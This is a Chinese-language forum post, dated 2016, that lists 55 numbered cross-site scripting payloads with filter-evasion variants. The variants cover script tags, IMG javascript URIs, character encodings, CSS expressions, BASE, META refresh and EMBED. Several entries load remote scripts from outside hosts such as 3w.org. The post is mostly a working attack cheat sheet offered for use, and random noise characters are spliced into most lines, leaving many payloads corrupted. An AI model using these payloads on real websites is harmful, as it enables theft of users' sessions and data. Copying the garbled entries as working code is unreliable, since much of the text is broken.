(1)普通的XSS JavaScript注入
1 g8 G1 s2 q$ K5 C0 H8 l6 o<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 K x3 C8 W8 J; J$ u' }# ?' G(99)另类弹框
r! U4 O: F. t5 B( {<q/oncut=alert()>1
& @9 b8 G7 P+ a8 C! D& Y<s/onclick=alert()>b$ N- e. k& M8 E8 D( j$ f% t4 n
<XSS=" onclick="alert(1)//">clickme</SSX=">( g! Q, X/ A9 y
<zzz onclick=alert`1`>clickme</zzz> 6 B2 N3 |; l# C; |1 c0 P# p
<a onclick=alert`1`>clickme</a>: F# d5 O- `1 k0 i1 ?6 ]
<a=">clickme</a=">( j$ W' I( q1 Q) o" A
<a=">clickme</a>
. F3 A# r$ S& f3 N<z=">clickme</z=">
" E0 B4 v! u& B8 B+ }0 [/ z<z onclick=alert`1`>clickme</z>
8 c/ r: g A3 H8 m) |$ \+ |6 z5 i" k5 X9 a; ?% _0 {2 L
(2)IMG标签XSS使用JavaScript命令& B1 L7 a; J4 }
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& p: q0 q$ H+ `* d: S
- O% A" i2 x+ Q8 t' x(3)IMG标签无分号无引号1 I* P" G7 C& q) g6 q" Z4 w. b
<IMG SRC=javascript:alert(‘XSS’)>
& ~( r2 x' ?' ?. Z2 ?( f: |4 D% e5 e9 _0 W! d, I
(4)IMG标签大小写不敏感
& w) } T" J+ V$ J. H<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
# O! L: @8 y( U: e# Y
4 p+ N% X3 z! A2 c(5)HTML编码(必须有分号)
7 N5 W& L% @9 u: `) z1 r3 M3 N' p$ z<IMG SRC=javascript:alert(“XSS”)>/ ^5 ?+ m2 L- U6 F$ v
5 k- i. U C$ q; R. c; `' N2 T(6)修正缺陷IMG标签
) ]& l4 L* C+ }" A/ C5 I* |/ W<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>& `5 Q- R1 b% _7 W) D E3 o. `" O+ e
' H- S4 T6 H% H5 S& ?6 P(7)formCharCode标签(计算器): g7 J4 a% f: `0 f/ p1 P
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
& }- h2 N* s; s% \8 T& l6 K" f6 k
(8)UTF-8的Unicode编码(计算器)
1 Q' C% X3 Y4 r* H+ ]<IMG SRC=jav..省略..S')>
4 I! J/ S! ~$ h1 p6 p$ }) g& ^- g0 G# ~
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)5 Q! x5 m8 W" u! v: ^6 t, i
<IMG SRC=jav..省略..S')>$ H' a+ C* |" c: O" t; ?. C
5 t9 w [/ a9 P& I5 B, [(10)十六进制编码也是没有分号(计算器)" I$ b( U0 R& ?/ z
<IMG SRC=\'#\'" /span>
5 L7 O* _/ @; ?- L/ j6 V& d6 _
( N. A9 `/ d) b( Q! b1 Z$ }+ h! V \(11)嵌入式标签,将Javascript分开4 }1 U( @: W) E2 F; ]/ u
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
/ B& k% G" W N9 J' y$ p% \+ o5 O4 h* S2 `) l- m% y" p* e4 n
(12)嵌入式编码标签,将Javascript分开
8 g9 Z' C5 O8 k' j6 M3 U<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
. z- }1 s" R/ P, P
0 g+ `2 a' ~6 g# U(13)嵌入式换行符
' B9 l& {9 k+ F7 y' v<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
% o0 ` s# F9 Z( {
+ U: @- Y0 B9 @/ V* z0 b9 L(14)嵌入式回车# }+ z2 v5 k% r* c: x# u
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
3 P# F+ S6 m) k- z
. o# m/ G- b/ x/ G" h0 s' \' F(15)嵌入式多行注入JavaScript,这是XSS极端的例子
. ?6 P0 Y" P2 Y Y. y+ B% l<IMG SRC=\'#\'" /span>
0 u( H) j# D* @# L
& K3 I$ h3 O4 ?, I5 Y5 B(16)解决限制字符(要求同页面)
( l# C! v2 @8 K$ s<script>z=’document.’</script>" z \; Y X' p8 }' c
<script>z=z+’write(“‘</script>
$ Q4 ~ n* M7 o& [) N<script>z=z+’<script’</script>* s( {2 g/ k3 \2 \" g! X! V8 h2 z
<script>z=z+’ src=ht’</script>
& r1 s- x) `( ~<script>z=z+’tp://ww’</script>, ^" N: W6 Y. F4 D9 M6 I; W
<script>z=z+’w.shell’</script>2 F3 F7 N) l% ?( w6 i7 |" F2 o
<script>z=z+’.net/1.’</script>
5 r% b1 e1 \7 _( X6 S- U* d/ y/ y<script>z=z+’js></sc’</script>; X: z$ b6 d. Y; X) u) Z
<script>z=z+’ript>”)’</script>+ a" h7 B4 @+ ]# F# F3 `' \
<script>eval_r(z)</script>% e- M* z& i4 `7 D6 d( X5 O
. W; A* z; ]1 @6 M6 ^' t
(17)空字符
3 W b6 }" l3 r( Sperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out" y5 R& q/ d* g: \5 h) ^) f5 W3 E
/ F3 @& M# J. y/ Q(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
\$ e) F' W/ x) [+ P6 m I: xperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out2 @1 F( ?1 y: y' k
1 E8 R2 d$ l3 g5 g y$ j
(19)Spaces和meta前的IMG标签
# L+ y& I" k; f9 i# h<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>8 [3 w3 q( I8 s2 s. W% m
5 v' M5 J; p6 R. ~( x% n! J- c% R1 b(20)Non-alpha-non-digit XSS
3 { Z8 O: T7 S<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
: g$ E, j* X% f: a, n4 m5 L$ U! e/ A$ T3 e
(21)Non-alpha-non-digit XSS to 2
) i7 N' n1 c8 q& o( S<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
* D' n9 N8 U4 I0 s2 P( W* E
+ g/ H5 ?; ~7 m5 g(22)Non-alpha-non-digit XSS to 3& T; J/ R. p) N" \. A$ X. {
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
3 }" @, d6 r( }8 ?' {6 U5 p0 @7 h7 a9 R' I5 b6 s
(23)双开括号
; C; i; D+ ~) p( { Z' ~1 i<<SCRIPT>alert(“XSS”);//<</SCRIPT>& M5 m1 e `5 x
( m7 C: f. V3 J7 J8 ]& _! V(24)无结束脚本标记(仅火狐等浏览器)
8 S- w# I% T4 Q5 s9 {% j" ~- ^/ \<SCRIPT SRC=http://3w.org/XSS/xss.js?<B> `3 n$ S# W' [! y( }
% F4 a% W+ S9 D! }2 e(25)无结束脚本标记2
- n ]9 P; Z8 w) f4 t8 C<SCRIPT SRC=//3w.org/XSS/xss.js>
: N3 O9 H+ z/ p+ F6 j) k9 |
; g& J$ @# g9 W" h- v(26)半开的HTML/JavaScript XSS
+ z& B }# C Z<IMG SRC=\'#\'" /span>+ f/ P* e2 g3 |" W7 E
% S9 W* F! @6 c; p
(27)双开角括号
, z ]( _% S3 [0 H+ S<iframe src=http://3w.org/XSS.html <
) P; s4 l/ p$ ^
% R$ u" `# \# U5 U4 N$ \ o, @0 }/ l(28)无单引号 双引号 分号* L+ h9 ^8 Y0 l& [# h1 r
<SCRIPT>a=/XSS/$ a- X* ^4 V# D$ Z) _# W
alert(a.source)</SCRIPT>
8 Z7 i! E. W/ B P7 A# G1 Q6 E+ i
) x5 `9 H/ k$ C- }+ ?(29)换码过滤的JavaScript, B' {. q+ Y; K3 }
\”;alert(‘XSS’);//
- w6 {- ]0 {; B( p& H8 Z* Z3 M0 n9 i; S- G! v- _0 y7 L5 i4 O
(30)结束Title标签
+ y) m; C; P0 E8 F' a: \</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>* x8 Z- S! T& x* T7 d% `
. f8 @1 |$ Z$ f, b6 f(31)Input Image0 _& l: e9 S; U- ]: W! s( y" r1 `
<INPUT SRC=\'#\'" /span>
3 a/ e# L" x9 _% y, D( `' v; ^6 w% d2 ~8 ?- \+ ^$ Y9 f
(32)BODY Image6 g/ G3 u Y$ U# f
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>! B# q" N0 ~* O* Q
' C2 f/ w5 e, `8 _( K: V: M
(33)BODY标签
$ f* j, v( E! F1 H<BODY(‘XSS’)>
& S& w2 Y/ w8 M2 i! R
/ Y3 Z( q6 a# B) c$ l: |. v' p(34)IMG Dynsrc( U6 i6 t: ]; Z+ x
<IMG DYNSRC=\'#\'" /span>, t' O& ^1 G7 G9 z, K
1 q, @; f/ F- N$ K+ S(35)IMG Lowsrc& r7 @1 v) f7 L8 e1 J+ `$ U
<IMG LOWSRC=\'#\'" /span>1 ~; m6 M/ I+ N* i, U
. f3 y6 Y2 t5 w
(36)BGSOUND
& I% N! N; ~ w& k _/ y$ |<BGSOUND SRC=\'#\'" /span>
. v8 D9 F: W/ [. U% s1 S/ v# Z7 o, m
(37)STYLE sheet
& C" j% m2 ~+ Y* q" p5 D9 ]<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
8 N, H4 ~5 z3 G# @, D7 k6 B% S' [) K* Z6 s, [
(38)远程样式表
1 Z0 K- j3 e6 s<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>! o3 e$ ?' h* `$ ^& Y4 _' U g* b
e$ n# }- ?6 J u+ N N* }2 o) M
(39)List-style-image(列表式)8 d, X# t' {7 J7 B, p" {
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS& M" O! i5 k! V' ^' a
5 U9 F' M/ d, p; e! w
(40)IMG VBscript( C" X: G* W4 [
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS8 ~" q& K2 E7 o/ H# o
1 {6 t$ x1 W0 c! }6 {- H( ?(41)META链接url2 m7 ^, W& g& q- m% B7 W# J
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>5 U2 [ c% |) J
5 z+ s+ j0 |$ @# R$ h
(42)Iframe
6 h% L" F* q5 I<IFRAME SRC=\'#\'" /IFRAME>
' s# p, a5 p# j9 P1 C. Y
; `+ `6 l$ C' f5 X( @(43)Frame2 k3 Y/ b$ @& Q1 L$ N$ p
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>2 c/ P+ k* `5 o+ N6 a" E9 i
, E1 _6 v+ V+ k% m O/ j(44)Table
. `2 M+ E1 y, l7 f' V7 M* R) p<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>1 U% z2 y" P4 O! `9 Y8 O" i
6 {3 v/ } n2 t. }* C6 E; ~(45)TD
; ]6 c6 f0 h4 b) Z. K<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>$ l7 z# ]% _6 O7 e
0 Z! P& c- W8 M2 Z/ O7 ~/ \(46)DIV background-image
6 E, n ~* S' A0 G, e<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! C( l3 T0 p3 [. n+ ]: i; `0 r5 N5 S
; s& O+ |$ E' A7 I(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)1 D o- R3 ` S+ f9 S
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>2 c& I! i2 \3 W' g& r; w
6 I1 w+ }) C5 `( `9 V(48)DIV expression
% b) ^2 {" b/ ^: ~% D) d* c<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
8 w1 o2 E3 w( r. L. K8 y: r# O: E8 _" |1 E. P+ s
(49)STYLE属性分拆表达2 p1 ^3 ^+ t ~5 U2 {: i
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
# }- |4 {- p9 ?4 I( l0 |* w) h! I+ m. d3 Y& p/ `; O& _2 k
(50)匿名STYLE(组成:开角号和一个字母开头)
" M S- A% ]! O) c4 I# D2 U& _1 ^<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
( _; g$ e% O' o4 R. C j$ p
4 _ K I9 e& ~1 r! J2 A5 f(51)STYLE background-image7 t! U1 g1 y) ^1 @3 y# k
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
" c8 d" ?) W: p* L% p( j7 H0 q1 P# ?5 D- b/ j7 j
(52)IMG STYLE方式9 c" Z% [$ q: S$ Y
exppression(alert(“XSS”))’>3 S A) x" ^0 E! J( X* _3 f
1 n) W# c5 \8 g! T) p(53)STYLE background
2 @) I' Q9 H/ _/ N, ?: d6 G4 S: J<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>2 z0 @7 ?$ u* }6 X+ O
- y4 M+ M9 U4 L( p7 C: D; e' c(54)BASE
G) B* ?( z1 \7 C# [$ Y4 ]) \<BASE HREF=”javascript:alert(‘XSS’);//”>
/ x, f3 G8 r' h, A3 j: ?( L
% q9 R5 b4 K* t5 X, z! y1 }(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS# A1 [6 y' b- g4 J+ G4 Z
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>$ W! R: r- |( E( F) a
|
发表于 2016-4-28 10:06:15
收藏
支持
反对